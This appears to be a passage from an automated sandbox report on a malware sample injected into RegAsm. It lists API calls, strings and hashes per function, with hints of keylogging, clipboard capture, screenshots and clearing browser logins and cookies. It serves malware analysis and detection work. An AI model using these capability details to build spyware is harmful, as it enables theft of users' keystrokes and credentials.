                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                • String ID: pth_unenc
                                                                • API String ID: 3123878439-4028850238
                                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetCursorInfo$User32.dll
                                                                • API String ID: 1646373207-2714051624
                                                                • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetLastInputInfo$User32.dll
                                                                • API String ID: 2574300362-1519888992
                                                                • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __alldvrm$_strrchr
                                                                • String ID:
                                                                • API String ID: 1036877536-0
                                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                • __freea.LIBCMT ref: 100087D5
                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                • String ID:
                                                                • API String ID: 2652629310-0
                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                APIs
                                                                Strings
                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                • API String ID: 3472027048-1236744412
                                                                • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                APIs
                                                                • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DisplayEnum$Devices$Monitors
                                                                • String ID:
                                                                • API String ID: 1432082543-0
                                                                • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                APIs
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$CloseHandleReadSize
                                                                • String ID:
                                                                • API String ID: 3642004256-0
                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                APIs
                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32 ref: 0041C5FB
                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32 ref: 0041C625
                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$ForegroundLength
                                                                • String ID: [ $ ]
                                                                • API String ID: 3309952895-93608704
                                                                • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                • String ID:
                                                                • API String ID: 188215759-0
                                                                • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                APIs
                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                • String ID:
                                                                • API String ID: 2633735394-0
                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MetricsSystem
                                                                • String ID:
                                                                • API String ID: 4116985748-0
                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                APIs
                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                • String ID:
                                                                • API String ID: 1761009282-0
                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                APIs
                                                                • _free.LIBCMT ref: 1000655C
                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                • String ID: *?$.
                                                                • API String ID: 2667617558-3972193922
                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                APIs
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                • String ID: image/jpeg
                                                                • API String ID: 1291196975-3785015651
                                                                • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                APIs
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                • API String ID: 1881088180-3686566968
                                                                • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                APIs
                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ACP$OCP
                                                                • API String ID: 0-711371036
                                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                APIs
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
